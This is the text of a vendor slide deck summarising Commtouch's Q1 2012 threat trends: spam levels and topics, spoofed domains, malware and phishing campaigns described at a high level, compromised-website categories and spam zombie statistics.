The Commtouch Quarterly Internet Threats Trend Report provides insight on the latest spam, malware, phishing schemes and other web security threats. The April 2012 edition provides analysis of Internet security threats that occurred during the first quarter of 2012.
6. Key Security Highlights
Spam Zombie daily turnover
270,000 Zombies
Up from 209,000 in Q4, 2011
(Zombie turnover is the number of zombies turned off and on daily)
7. Key Security Highlights
Most popular blog topic on
user generated content sites
Streaming media/
downloads (22%)
Streaming media & downloads
remains in top spot
Includes sites with MP3 files or music related sites such as fan
pages (these might also be categorized as entertainment)
8. Key Security Highlights
Most popular spam topic
Pharmacy Ads
(39% of all spam)
Up 8% over Q4 2011
2nd place Replica spam also increased by over 5%
10. Key Security Highlights
Website category most likely to
be compromised with malware
Pornography/Explicit
• “Parked domains” dropped to 2nd spot
• New entrant “Fashion & Beauty” captured 3rd place
12. Q1 Spam Trends
• Marginal increase in spam during the December 2011 holiday season
• Otherwise, spam remained low vs. Q1 2011 – avg decrease nearly 40%
• Average daily spam levels dropped to 94 billion spam and phishing
emails/day
Spam levels – Dec 2011 to March 2012
December January February March
Source: Commtouch
13. Q1 Spam Trends
• Spam averaged 75% of all emails in Q1
Spam % of all emails - Dec 2011 to Mar 2012
December January February March
Source: Commtouch
14. Q1 Spam Trends
Replica spam affiliate program “GlavTorg” closes
• Spam affiliate programs provide the link between fake
pharmaceuticals and replica manufacturers and spammers
• Dec 2011 - GlavTorg (affiliate focused on replica handbags and
clothing) announced it would stop affiliates payouts at end of
Jan’12
• Commtouch Labs evaluated the effect of the closure with
introduction of the “spam-subject cloud tool”
– Samples thousands of spam messages at definable intervals
– Frequency of spam terms indicated by text size
• Spam subjects used in massive quantities are instantly
distinguishable.
15. Q1 Spam Trends
• Spam topics cloud for the end of January 2012 shows no
evidence of GlavTorg related products
• Spam levels for the period show
Spam Topics Cloud for End of
no obvious increase or decrease January 2012
around dates when payments
were stopped
• Conclusion:
Spammers have apparently easily
realigned their activities.
Source: Commtouch
16. Q1 Spam Trends
Spam cloud for Entire Q1 2012
Subjects include: Spam Topics Cloud for Q1 2012
• Pharmaceuticals (Viagra, Cialis)
• Replicas (Rolex, Breitling)
• Enhancers
• Software (CS5, Windows, Adobe)
• “Dating”
– Present, but due to the great
variance of subject words, are less
prominent
Source: Commtouch
17. Q1 Spam Trends
Spam Topics in Q1
• Pharmacy spam continued to increase, as it did last quarter, to nearly
39% of all spam (~8% more than the previous quarter)
• Replica-themed spam also increased in Q1 by over 5%
Source: Commtouch
18. Q1 Spam Trends
Top Faked (Spoofed) Spam Sending Domains*
• gmail.com is once again the
most spoofed domain
(increasing above 25% for
the first time)
• The top 15 features popular
social networking and mail
sites (AOL, Yahoo, Facebook,
LinkedIn, MySpace) as well
as DHL.com – often used as
part of email malware
attacks
* Domains used by spammers in the “from”
Source: Commtouch field of the spam emails.
19. Q1 Spam Trends
Find out more about Spam Trends in Q1 by
downloading the complete April
Internet Threats Trend Report
http://www.commtouch.com/threat-report-april-2012
21. Q1 Malware Trends
Did cybercriminals target accountants?
• The scale of a February attack was so large that it
certainly must have worked on many CPAs – but
also many other individuals
• Attacks included subjects such as:
• “Fraudulent tax return assistance accusations”
• “Your accountant license can be revoked”
• “Your accountant cpa license termination”
• “Income tax return fraud accusations”
22. Q1 Malware Trends
How it worked
• Clicking on the link downloaded a short HTML page that
promises “Page is loading, please wait. You will see tax info
on this screen.”
• In the background, a small Phony accountant tax fraud emails
script creates a nested lead to malware
iFrame, which brought in
more JavaScript, creating
further dynamic content
• The process repeated until
a large portion of malware
code was activated
Source: Commtouch
23. Q1 Malware Trends
• 2 weeks later a similarly sized attack targeted accounting
practitioners and the small business market
• Method this time was by describing fictitious purchases of
Intuit accounting software.
• Subjects lines included:
– Your QuickBooks software order
– Your Intuit.com order
– Your Intuit.com invoice
– Please confirm your Intuit.com invoice
• The malware downloaded and
deployed in the same way as
described above in previous attack
Source: Commtouch
24. Q1 Malware Trends
Email attached malware levels generally low Q1 2012
• Malware distributors generally stuck to popular malware
topics, such as Fedex delivery notices.
• Several other interesting social engineering techniques were
also used during the quarter:
– Google have received your CV (with an attached CV submission form)
– Your friend invited you to Twitter (with an attached “invitation card”)
– Someone wanting to be your friend on Hi5 (a social network)
– Shipping updates for your Amazon.com order (with attached “shipping
documents”)
25. Q1 Malware Trends
– American Airlines ticket confirmations
– “I love you” (containing only the text “lovely :-)” and phony assurance
that F-Secure Antivirus had found no virus in the attachment
– Sex pictures (with an attached zip refering to www.freeporn4all. Once
extracted, a typical Explorer view shows a file named “document.txt”.
Widening the filename column reveals the true “.exe” extension of the
malware (following multiple space characters) – an old trick but
probably still effective
26. Q1 Malware Trends
Top 10 Malware of Q1 2012
Rank Malware name Rank Malware name
1 W32/InstallCore.A2.gen!Eldorado 6 W32/Sality.gen2
2 W32/RLPacked.A.gen!Eldorado 7 W32/HotBar.L.gen!Eldorado
3 W32/Sality.C.gen!Eldorado 8 W32/Vobfus.AD.gen!Eldorado
4 W32/Heuristic-210!Eldorado 9 JS/Pdfka.CI.gen
5 W32/RAHack.A.gen!Eldorado 10 W32/Korgo.V
Source: Commtouch
27. Q1 Malware Trends
For a complete analysis of Malware in Q1 and the
specific attacks employed, download the complete
April 2012 Internet Threats Trend Report
http://www.commtouch.com/threat-report-april-2012
29. Q1 Web Security
Facebook “unwatchable video” scam
• Several variants of this scam have appeared on Facebook in the last
few months
• January’s version starts with a friend’s post that looks something
like this:
Source: Commtouch
• The link takes clickers to a Blogspot page which has been very convincingly
designed to look like a Facebook page with an embedded video player.
– None of the buttons on the page are actually clickable
30. Q1 Web Security
• Visitors are informed that
they need the Divx plugin/
YouTube Premium plugin
• Clicking on the download link runs a malicious link that:
– Posts a link on the user’s wall to attract more users to
click on the link
– Installs Firefox or Chrome extensions (depending on
browser), used to redirect users to several further scams.
– Redirections happen regardless of the site user actually
intended to go to. One of the redirections is to a scam
offering a $50 Starbucks gift card. After coaxing the
Facebook user to like and share the link they are led to
an affiliate marketing site.
31. Q1 Compromised Websites
See more examples of compromised websites
Download the complete April 2012 Internet
Threats Trend Report for more details
http://www.commtouch.com/threat-report-april-2012
32. Q1 Compromised Websites
Website categories infected with malware
• Pornographic sites climbed back up to the top spot pushing down Parked
domains. As noted in previous reports, the hosting of malware may well
be the intention of the owners of the parked domains and pornography
sites.
• A new entry into the top 3 is “Fashion and Beauty” sites
Rank Category Rank Category
1 Pornography/Sexually Explicit 6 Education
2 Parked Domains 7 Health & Medicine
3 Fashion and Beauty 8 Computers & Technology
4 Portals 9 Business
5 Entertainment 10 Leisure & Recreation
Source: Commtouch
33. Q1 Compromised Websites
Compromised Websites: An Owner’s Perspective
• Commtouch, in cooperation with StopBadware, undertook a survey of
webmasters whose sites had been compromised
• The report presents statistics & opinions on how site owners navigate the
process of learning their sites have been hacked and repairing the damage
• Some results
– Over 90% of respondents didn't notice any strange activity, despite the fact
that their sites were being abused to send spam, host phishing pages, or
distribute malware.
– Nearly two-thirds of the webmasters surveyed didn't know how the
compromise had happened
– About half of site owners discovered the hack when they attempted to visit
their own site and received a browser or search engine warning
View the complete list of findings by downloading the full report
http://www.commtouch.com/compromised-websites-report-2012
34. Q1 Compromised Websites
Phishing Trends
• Phishing attacks target account
information for many services:
– Banks, email and social network
accounts, and online games.
• Commtouch’s Security Blog has also
featured phishing aimed at Google
Adwords customers.
• In January, a similar phishing attack
was directed at Microsoft adCenter
users. The links in the email led to a
very convincing replica of the
adCenter login page.
35. Q1 Compromised Websites
Website categories infected with phishing
• During the first quarter of 2012, Commtouch analyzed which categories of
legitimate Web sites were most likely to be hiding phishing pages (usually
without the knowledge of the site owner).
• Portals (offering free website hosting) jumped into the highest position.
Sites related to games (the previous leader), dropped off the list.
Rank Category Rank Category
1 Portals 6 Sports
2 Shopping 7 Leisure & Recreation
3 Fashion & Beauty 8 Health and medicine
4 Education 9 Real Estate
5 Business 10 Personal sites
Source: Commtouch
36. Q1 Compromised Websites
Download the complete April 2012 Internet
Threats Trend Report for more details
http://www.commtouch.com/threat-report-april-2012
38. Q1 Zombie Trends
Daily Turnover of Zombies in Q1
• Average turnover: 270,000 newly activated each day sending spam
(increase from 209,000 in Q4 2011)
• Large drop at start of Nov apparently result of Esthost botnet takedown
• Although Esthost primarily used for DNS changing (redirecting Web
requests to malicious sites), some apparently also used to send spam
• Since start of 2012, spammers have worked to source new zombies
Daily newly activated spam zombies: Oct 2011 to mar 2012
Source: Commtouch
39. Q1 Zombie Trends
Worldwide Zombie Distribution in Q1
Source: Commtouch
• India again claimed top zombie producer title, but dropped below
20% from nearly 24% in Q4 2011
• Brazil and Russian Federation both climbed back up to the 2nd and
3rd positions, respectively
• Argentina, Poland and Italy joined the top 15, displacing The
United States, Romania and Ukraine
40. Q4 Zombie Trends
Download the complete April 2012 Internet
Threats Trend Report for more details
http://www.commtouch.com/threat-report-april-2012
42. Q1 Web 2.0 Trends
Web 2.0 Trends
• “Streaming media and downloads” was the most popular blog or page topic
again in Q2, remaining at 22%.
Rank Category % Rank Category %
1 Streaming Media & Downloads 22% 8 Religion 5%
2 Computers & Technology 8% 9 Sports 4%
3 Entertainment 7% 10 Education 4%
4 Pornography/Sexually Explicit 5% 11 Leisure & Recreation 3%
5 Restaurants & Dining 5% 12 Health & Medicine 3%
6 Fashion & Beauty 5% 13 Games 3%
7 Arts 5% 14 Sex Education 2%
Source: Commtouch
The streaming media & downloads category includes sites with MP3 files or
music related sites such as fan pages.
43. Download the complete April 2012
Internet Threats Trend Report
at
http://www.commtouch.com/threat-report-april-2012
44. For more information contact:
info@commtouch.com
650 864 2000 (Americas)
+972 9 863 6895 (International)
Web: www.commtouch.com
Blog: http://blog.commtouch.com